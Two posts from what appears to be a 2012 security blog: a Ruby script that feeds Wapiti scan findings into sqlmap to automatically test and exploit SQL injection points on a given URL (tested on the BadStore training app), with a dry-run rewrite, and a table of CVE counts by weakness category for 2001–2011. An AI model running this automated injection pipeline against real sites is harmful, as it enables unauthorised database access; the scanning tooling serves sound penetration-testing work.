Sunday, May 20, 2012

Automating SQLMap with data from wapiti

Wapiti is really fast at finding possible SQL injection points in a web application or website. SQLMap is great at figuring out how to exploit these possible injection points. The following script runs Wapiti on a host to find possible injection points, then passes that data to SQLMap to try to exploit them. Tested against BadStore, running the latest SVN revisions of both Wapiti and SQLMap. You can play around with the arguments I am passing to SQLMap and make the scans a bit more thorough, but at the expense of speed.
#!/usr/bin/env ruby

require 'securerandom'   # SecureRandom.uuid lives in the standard library; the ActiveSupport copy is gone
require 'rexml/document'
require 'shellwords'     # escape URLs and POST bodies before they reach a shell

wapiti_path = '/home/bperry/tools/wapiti/trunk/src/'
sqlmap_path = '/home/bperry/tools/sqlmap/'

wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'

remote_host = ARGV[0]
abort "usage: #{$0} <url>" if remote_host.nil?

# Wapiti's SQL injection probe, URL-encoded; it marks the parameter Wapiti found injectable
MARKER = "%BF%27%22%28"

p "Running wapiti..."
`#{wapiti_path}wapiti.py #{Shellwords.escape(remote_host)} -f xml -o #{wapiti_report_path}`

p "Report saved to #{wapiti_report_path}"

p "Parsing results"

results = []

doc = REXML::Document.new(File.read(wapiti_report_path))

doc.elements.each('/report/bugTypeList/bugType') do |element|
  bug_type = element.attributes["name"]

  next if bug_type != "SQL Injection"

  p "Parsing " + bug_type

  element.elements.each("bugList/bug") do |bug|
    result = { :type => bug_type }

    bug.elements.each do |child|
      if child.name == "url"
        result[:url] = child.text
      elsif child.name == "parameter"
        result[:parameter] = child.text
      end
    end
    results << result
  end
end

results.each do |result|
  next if result[:type] !~ /SQL Injection/
  p "Running sqlmap"

  if result[:url].index(result[:parameter])
    # GET: the marker sits in the query string; swap it for a harmless placeholder
    url = result[:url].gsub(MARKER, "abcd")

    params = result[:url].split("?")[1].split("&")

    # sqlmap only needs to test the parameter Wapiti flagged; skip all the others
    skipped_params = []
    params.each do |param|
      skipped_params << param.split("=")[0] unless param.include?(MARKER)
    end

    p "Running GET sql injection test on url: " + url
    sqlmap_command = "#{sqlmap_path}sqlmap.py -u #{Shellwords.escape(url)} --smart --skip=#{Shellwords.escape(skipped_params.join(","))} --technique=EUS --flush-session --fresh-queries --level=2 --batch"
    out = `#{sqlmap_command}`
    print out   # print, not printf: sqlmap output contains '%' sequences that printf would try to format
  else
    url = result[:url]
    p "Running POST sql injection test on url: " + url
    p "With data: " + result[:parameter]

    # POST: the marker sits in the request body
    parameter = result[:parameter].gsub(MARKER, "abcd")

    params = result[:parameter].split("&")

    skipped_params = []
    params.each do |param|
      skipped_params << param.split("=")[0] unless param.include?(MARKER)
    end

    sqlmap_command = "#{sqlmap_path}sqlmap.py -u #{Shellwords.escape(url)} --data=#{Shellwords.escape(parameter)} --skip=#{Shellwords.escape(skipped_params.join(","))} --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
    p sqlmap_command
    sqlmap_output = `#{sqlmap_command}`

    print sqlmap_output
  end
end
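Before letting a pipeline like this loose, it is worth seeing exactly which requests it will hand to sqlmap. The following is an added example, not code from the original post: the report-to-command mapping of the script above written as a pure function over a constructed Wapiti report, returning argv arrays without executing anything. It assumes the report layout and the %BF%27%22%28 marker as the script reads them; target.test, the paths and the parameter names are placeholders.

```ruby
require 'rexml/document'

MARKER = '%BF%27%22%28'   # Wapiti's SQLi probe  ¿'"(  URL-encoded; it marks the flagged parameter

# Constructed report in the layout the script reads; target.test is a placeholder host.
SAMPLE_REPORT = <<~XML
  <report><bugTypeList>
    <bugType name="SQL Injection"><bugList>
      <bug>
        <url>http://target.test/search.cgi?item=#{MARKER}&amp;action=search</url>
        <parameter>item</parameter>
      </bug>
      <bug>
        <url>http://target.test/login.cgi</url>
        <parameter>email=#{MARKER}&amp;passwd=x&amp;action=login</parameter>
      </bug>
    </bugList></bugType>
    <bugType name="Cross Site Scripting"><bugList/></bugType>
  </bugTypeList></report>
XML

SQLMAP_OPTS = %w[--smart --technique=EUS --flush-session --fresh-queries --level=2 --batch].freeze

# One argv array per SQL Injection finding. Nothing is executed here, and an argv
# (rather than a shell string) means URL characters such as & or ' never reach a shell.
def sqlmap_jobs(xml, sqlmap_path = './sqlmap.py')
  jobs = []
  doc = REXML::Document.new(xml)
  doc.elements.each("report/bugTypeList/bugType[@name='SQL Injection']/bugList/bug") do |bug|
    url, param = bug.elements['url'].text, bug.elements['parameter'].text
    if url.include?(param)                 # GET: the probe is in the query string
      query = url.split('?', 2)[1].to_s    # .to_s tolerates a URL with no query at all
      job = [sqlmap_path, '-u', url.gsub(MARKER, 'abcd')]
    else                                   # POST: the probe is in the request body
      query = param
      job = [sqlmap_path, '-u', url, "--data=#{param.gsub(MARKER, 'abcd')}"]
    end
    # Only the flagged parameter needs testing; every other one is skipped.
    skip = query.split('&').reject { |kv| kv.include?(MARKER) }.map { |kv| kv.split('=', 2)[0] }
    job << "--skip=#{skip.join(',')}" unless skip.empty?
    jobs << job + SQLMAP_OPTS
  end
  jobs
end
```

Printing `sqlmap_jobs(SAMPLE_REPORT)` shows the two planned invocations; `Process.spawn(*job)` would run one without any shell quoting.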

Monday, May 7, 2012

Simple CVE stats from 2001-2011

Year 2001 has 1538 vulnerabilities
2001 had 8 vulns of type:  Buffer Errors
2001 had 4 vulns of type:  Cryptographic Issues
2001 had 4 vulns of type:  Path Traversal
2001 had 2 vulns of type:  Authentication Issues
2001 had 2 vulns of type:  Permissions, Privileges, and Access Control
2001 had 2 vulns of type:  Code Injection
2001 had 2 vulns of type:  Input Validation
2001 had 1 vulns of type:  Resource Management Errors
2001 had 1 vulns of type:  Link Following
2001 had 0 vulns of type:  Credentials Management
2001 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2001 had 0 vulns of type:  Cross-Site Scripting
2001 had 0 vulns of type:  Format String Vulnerability
2001 had 0 vulns of type:  Configuration
2001 had 0 vulns of type:  Information Leak / Disclosure
2001 had 0 vulns of type:  Numeric Errors
2001 had 0 vulns of type:  OS Command Injections
2001 had 0 vulns of type:  Race Conditions
2001 had 0 vulns of type:  SQL Injection
Total vulns in 2001 with CWE: 26
Percentage of vulns with CWE: 1.69050715214564%


Year 2002 has 2368 vulnerabilities
2002 had 41 vulns of type:  Buffer Errors
2002 had 32 vulns of type:  Permissions, Privileges, and Access Control
2002 had 32 vulns of type:  Cross-Site Scripting
2002 had 29 vulns of type:  Input Validation
2002 had 17 vulns of type:  Information Leak / Disclosure
2002 had 13 vulns of type:  Path Traversal
2002 had 9 vulns of type:  Configuration
2002 had 8 vulns of type:  Credentials Management
2002 had 8 vulns of type:  Code Injection
2002 had 7 vulns of type:  SQL Injection
2002 had 6 vulns of type:  Numeric Errors
2002 had 6 vulns of type:  Resource Management Errors
2002 had 5 vulns of type:  Authentication Issues
2002 had 3 vulns of type:  Cryptographic Issues
2002 had 2 vulns of type:  Race Conditions
2002 had 2 vulns of type:  Link Following
2002 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2002 had 1 vulns of type:  Format String Vulnerability
2002 had 1 vulns of type:  OS Command Injections
Total vulns in 2002 with CWE: 223
Percentage of vulns with CWE: 9.41722972972973%


Year 2003 has 1515 vulnerabilities
2003 had 59 vulns of type:  Buffer Errors
2003 had 40 vulns of type:  Cross-Site Scripting
2003 had 30 vulns of type:  Input Validation
2003 had 25 vulns of type:  Information Leak / Disclosure
2003 had 24 vulns of type:  Permissions, Privileges, and Access Control
2003 had 17 vulns of type:  Path Traversal
2003 had 13 vulns of type:  Code Injection
2003 had 12 vulns of type:  Configuration
2003 had 12 vulns of type:  SQL Injection
2003 had 9 vulns of type:  Authentication Issues
2003 had 9 vulns of type:  Credentials Management
2003 had 8 vulns of type:  Cryptographic Issues
2003 had 6 vulns of type:  Resource Management Errors
2003 had 4 vulns of type:  Numeric Errors
2003 had 2 vulns of type:  Format String Vulnerability
2003 had 2 vulns of type:  Race Conditions
2003 had 2 vulns of type:  Link Following
2003 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
2003 had 0 vulns of type:  OS Command Injections
Total vulns in 2003 with CWE: 274
Percentage of vulns with CWE: 18.0858085808581%


Year 2004 has 2669 vulnerabilities
2004 had 30 vulns of type:  Buffer Errors
2004 had 22 vulns of type:  Permissions, Privileges, and Access Control
2004 had 20 vulns of type:  Cross-Site Scripting
2004 had 9 vulns of type:  Path Traversal
2004 had 9 vulns of type:  Input Validation
2004 had 8 vulns of type:  SQL Injection
2004 had 6 vulns of type:  Authentication Issues
2004 had 6 vulns of type:  Credentials Management
2004 had 6 vulns of type:  Code Injection
2004 had 5 vulns of type:  Configuration
2004 had 4 vulns of type:  Information Leak / Disclosure
2004 had 4 vulns of type:  Resource Management Errors
2004 had 3 vulns of type:  Cryptographic Issues
2004 had 3 vulns of type:  Format String Vulnerability
2004 had 2 vulns of type:  Race Conditions
2004 had 2 vulns of type:  Link Following
2004 had 1 vulns of type:  Numeric Errors
2004 had 1 vulns of type:  OS Command Injections
2004 had 0 vulns of type:  Cross-Site Request Forgery (CSRF)
Total vulns in 2004 with CWE: 141
Percentage of vulns with CWE: 5.28287748220307%


Year 2005 has 4684 vulnerabilities
2005 had 64 vulns of type:  Buffer Errors
2005 had 48 vulns of type:  SQL Injection
2005 had 32 vulns of type:  Permissions, Privileges, and Access Control
2005 had 31 vulns of type:  Resource Management Errors
2005 had 28 vulns of type:  Cross-Site Scripting
2005 had 21 vulns of type:  Input Validation
2005 had 20 vulns of type:  Code Injection
2005 had 18 vulns of type:  Information Leak / Disclosure
2005 had 15 vulns of type:  Numeric Errors
2005 had 10 vulns of type:  Path Traversal
2005 had 5 vulns of type:  Link Following
2005 had 4 vulns of type:  Authentication Issues
2005 had 3 vulns of type:  Cryptographic Issues
2005 had 3 vulns of type:  Configuration
2005 had 2 vulns of type:  Credentials Management
2005 had 2 vulns of type:  Race Conditions
2005 had 1 vulns of type:  Cross-Site Request Forgery (CSRF)
2005 had 1 vulns of type:  Format String Vulnerability
2005 had 1 vulns of type:  OS Command Injections
Total vulns in 2005 with CWE: 309
Percentage of vulns with CWE: 6.59692570452605%


Year 2006 has 7043 vulnerabilities
2006 had 199 vulns of type:  Code Injection
2006 had 145 vulns of type:  Buffer Errors
2006 had 87 vulns of type:  Cross-Site Scripting
2006 had 84 vulns of type:  SQL Injection
2006 had 74 vulns of type:  Resource Management Errors
2006 had 63 vulns of type:  Input Validation
2006 had 50 vulns of type:  Permissions, Privileges, and Access Control
2006 had 37 vulns of type:  Numeric Errors
2006 had 29 vulns of type:  Information Leak / Disclosure
2006 had 21 vulns of type:  Path Traversal
2006 had 17 vulns of type:  Format String Vulnerability
2006 had 14 vulns of type:  Authentication Issues
2006 had 8 vulns of type:  Cryptographic Issues
2006 had 7 vulns of type:  Race Conditions
2006 had 6 vulns of type:  Configuration
2006 had 5 vulns of type:  Credentials Management
2006 had 3 vulns of type:  Cross-Site Request Forgery (CSRF)
2006 had 2 vulns of type:  OS Command Injections
2006 had 1 vulns of type:  Link Following
Total vulns in 2006 with CWE: 852
Percentage of vulns with CWE: 12.0971177055232%


Year 2007 has 6505 vulnerabilities
2007 had 451 vulns of type:  Buffer Errors
2007 had 366 vulns of type:  Cross-Site Scripting
2007 had 296 vulns of type:  Code Injection
2007 had 263 vulns of type:  SQL Injection
2007 had 229 vulns of type:  Permissions, Privileges, and Access Control
2007 had 228 vulns of type:  Input Validation
2007 had 164 vulns of type:  Path Traversal
2007 had 107 vulns of type:  Numeric Errors
2007 had 104 vulns of type:  Resource Management Errors
2007 had 96 vulns of type:  Information Leak / Disclosure
2007 had 69 vulns of type:  Authentication Issues
2007 had 41 vulns of type:  Cross-Site Request Forgery (CSRF)
2007 had 36 vulns of type:  Configuration
2007 had 31 vulns of type:  Format String Vulnerability
2007 had 25 vulns of type:  Link Following
2007 had 24 vulns of type:  Credentials Management
2007 had 19 vulns of type:  Cryptographic Issues
2007 had 18 vulns of type:  Race Conditions
2007 had 6 vulns of type:  OS Command Injections
Total vulns in 2007 with CWE: 2573
Percentage of vulns with CWE: 39.554189085319%


Year 2008 has 7031 vulnerabilities
2008 had 1480 vulns of type:  SQL Injection
2008 had 981 vulns of type:  Cross-Site Scripting
2008 had 582 vulns of type:  Buffer Errors
2008 had 574 vulns of type:  Permissions, Privileges, and Access Control
2008 had 467 vulns of type:  Input Validation
2008 had 447 vulns of type:  Path Traversal
2008 had 385 vulns of type:  Code Injection
2008 had 322 vulns of type:  Resource Management Errors
2008 had 222 vulns of type:  Authentication Issues
2008 had 221 vulns of type:  Information Leak / Disclosure
2008 had 177 vulns of type:  Link Following
2008 had 166 vulns of type:  Numeric Errors
2008 had 119 vulns of type:  Cross-Site Request Forgery (CSRF)
2008 had 69 vulns of type:  Credentials Management
2008 had 61 vulns of type:  Cryptographic Issues
2008 had 41 vulns of type:  Configuration
2008 had 33 vulns of type:  Format String Vulnerability
2008 had 25 vulns of type:  Race Conditions
2008 had 12 vulns of type:  OS Command Injections
Total vulns in 2008 with CWE: 6384
Percentage of vulns with CWE: 90.797895036268%


Year 2009 has 4848 vulnerabilities
2009 had 734 vulns of type:  Cross-Site Scripting
2009 had 673 vulns of type:  SQL Injection
2009 had 558 vulns of type:  Buffer Errors
2009 had 329 vulns of type:  Permissions, Privileges, and Access Control
2009 had 266 vulns of type:  Code Injection
2009 had 247 vulns of type:  Input Validation
2009 had 245 vulns of type:  Path Traversal
2009 had 237 vulns of type:  Resource Management Errors
2009 had 164 vulns of type:  Numeric Errors
2009 had 148 vulns of type:  Authentication Issues
2009 had 141 vulns of type:  Information Leak / Disclosure
2009 had 86 vulns of type:  Cryptographic Issues
2009 had 84 vulns of type:  Cross-Site Request Forgery (CSRF)
2009 had 56 vulns of type:  Credentials Management
2009 had 47 vulns of type:  Configuration
2009 had 32 vulns of type:  Race Conditions
2009 had 29 vulns of type:  Link Following
2009 had 23 vulns of type:  Format String Vulnerability
2009 had 11 vulns of type:  OS Command Injections
Total vulns in 2009 with CWE: 4110
Percentage of vulns with CWE: 84.7772277227723%


Year 2010 has 4696 vulnerabilities
2010 had 578 vulns of type:  SQL Injection
2010 had 566 vulns of type:  Cross-Site Scripting
2010 had 536 vulns of type:  Buffer Errors
2010 had 319 vulns of type:  Permissions, Privileges, and Access Control
2010 had 299 vulns of type:  Input Validation
2010 had 270 vulns of type:  Resource Management Errors
2010 had 256 vulns of type:  Path Traversal
2010 had 248 vulns of type:  Code Injection
2010 had 162 vulns of type:  Information Leak / Disclosure
2010 had 154 vulns of type:  Numeric Errors
2010 had 66 vulns of type:  Cross-Site Request Forgery (CSRF)
2010 had 62 vulns of type:  Cryptographic Issues
2010 had 56 vulns of type:  Authentication Issues
2010 had 51 vulns of type:  Credentials Management
2010 had 33 vulns of type:  Race Conditions
2010 had 26 vulns of type:  Link Following
2010 had 21 vulns of type:  Configuration
2010 had 12 vulns of type:  Format String Vulnerability
2010 had 12 vulns of type:  OS Command Injections
Total vulns in 2010 with CWE: 3727
Percentage of vulns with CWE: 79.3654173764906%


Year 2011 has 3733 vulnerabilities
2011 had 648 vulns of type:  Buffer Errors
2011 had 372 vulns of type:  Input Validation
2011 had 367 vulns of type:  Cross-Site Scripting
2011 had 366 vulns of type:  Resource Management Errors
2011 had 295 vulns of type:  Information Leak / Disclosure
2011 had 285 vulns of type:  Permissions, Privileges, and Access Control
2011 had 120 vulns of type:  Numeric Errors
2011 had 107 vulns of type:  SQL Injection
2011 had 92 vulns of type:  Code Injection
2011 had 91 vulns of type:  Path Traversal
2011 had 60 vulns of type:  Authentication Issues
2011 had 57 vulns of type:  Cross-Site Request Forgery (CSRF)
2011 had 57 vulns of type:  Cryptographic Issues
2011 had 34 vulns of type:  Configuration
2011 had 32 vulns of type:  Credentials Management
2011 had 26 vulns of type:  Link Following
2011 had 14 vulns of type:  Race Conditions
2011 had 13 vulns of type:  OS Command Injections
2011 had 8 vulns of type:  Format String Vulnerability
Total vulns in 2011 with CWE: 3044
Percentage of vulns with CWE: 81.5429949102599%
Total: 49439

To be honest, I am a bit dismayed at the quality of the data. 2001 only categorized 1.7% of the vulns recorded (I am sure most, if not all, were added retroactively). The highest percentage of vulns that had been categorized was 90% in 2008. I find it interesting that the first few years are dominated by buffer overflows (perhaps because of poor data), and then around 2008 web vulns become the top recorded and categorized. Perhaps this is because of the vast amount of new web technologies emerging. That is, until 2011, where buffer overflows are once again the most common. I used the XML files from NIST, and the source code I used to generate the stats is on github. It uses LINQ, so it isn't super speedy; it takes a few minutes. Works with Mono or .NET.
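An added example, not the post's C#/LINQ tool: the same tally in Ruby over a constructed NVD 2.0 feed fragment, giving per-year totals, per-category counts and the percentage of entries that carry a CWE, rendered in the layout of the listing above. The feed structure (entry elements with a vuln:cwe child), the CWE-id-to-name mapping and taking the year from the CVE id are assumptions; the CVE ids are placeholders.

```ruby
require 'rexml/document'

# CWE id -> NVD's category name; assumed mapping, only the ids the sample needs are listed.
CWE_NAMES = {
  'CWE-119' => 'Buffer Errors',
  'CWE-89'  => 'SQL Injection',
  'CWE-79'  => 'Cross-Site Scripting',
}.freeze

# Constructed stand-in for an nvdcve-2.0-YYYY.xml feed; entries without <vuln:cwe> are uncategorised.
SAMPLE_FEED = <<~XML
  <nvd xmlns="http://scap.nist.gov/schema/feed/vulnerability/2.0"
       xmlns:vuln="http://scap.nist.gov/schema/vulnerability/0.4">
    <entry id="CVE-2011-99901"><vuln:cwe id="CWE-119"/></entry>
    <entry id="CVE-2011-99902"><vuln:cwe id="CWE-119"/></entry>
    <entry id="CVE-2011-99903"><vuln:cwe id="CWE-89"/></entry>
    <entry id="CVE-2011-99904"/>
    <entry id="CVE-2001-99901"><vuln:cwe id="CWE-79"/></entry>
    <entry id="CVE-2001-99902"/>
    <entry id="CVE-2001-99903"/>
  </nvd>
XML

# Returns { year => { total:, with_cwe:, by_type: { name => count } } }.
# The year is read from the CVE id, which is how the per-year feed files are split.
def cwe_stats(xml)
  stats = Hash.new { |h, y| h[y] = { total: 0, with_cwe: 0, by_type: Hash.new(0) } }
  REXML::Document.new(xml).elements.each('nvd/entry') do |entry|
    s = stats[entry.attributes['id'][/CVE-(\d{4})-/, 1].to_i]
    s[:total] += 1
    cwe = entry.elements['vuln:cwe']
    next unless cwe                       # uncategorised: counted in the total only
    s[:with_cwe] += 1
    s[:by_type][CWE_NAMES.fetch(cwe.attributes['id'], cwe.attributes['id'])] += 1
  end
  stats
end

def pct_with_cwe(s)
  s[:total].zero? ? 0.0 : s[:with_cwe] * 100.0 / s[:total]
end

# One year in the layout of the listing above, categories sorted by count.
def report_lines(year, s)
  lines = ["Year #{year} has #{s[:total]} vulnerabilities"]
  s[:by_type].sort_by { |name, n| [-n, name] }.each do |name, n|
    lines << "#{year} had #{n} vulns of type:  #{name}"
  end
  lines << "Total vulns in #{year} with CWE: #{s[:with_cwe]}"
  lines << "Percentage of vulns with CWE: #{pct_with_cwe(s)}%"
end
```

Running it over the real feed files means reading each nvdcve-2.0-YYYY.xml in turn and merging the hashes; the gaps the post describes show up as a low with_cwe count relative to total.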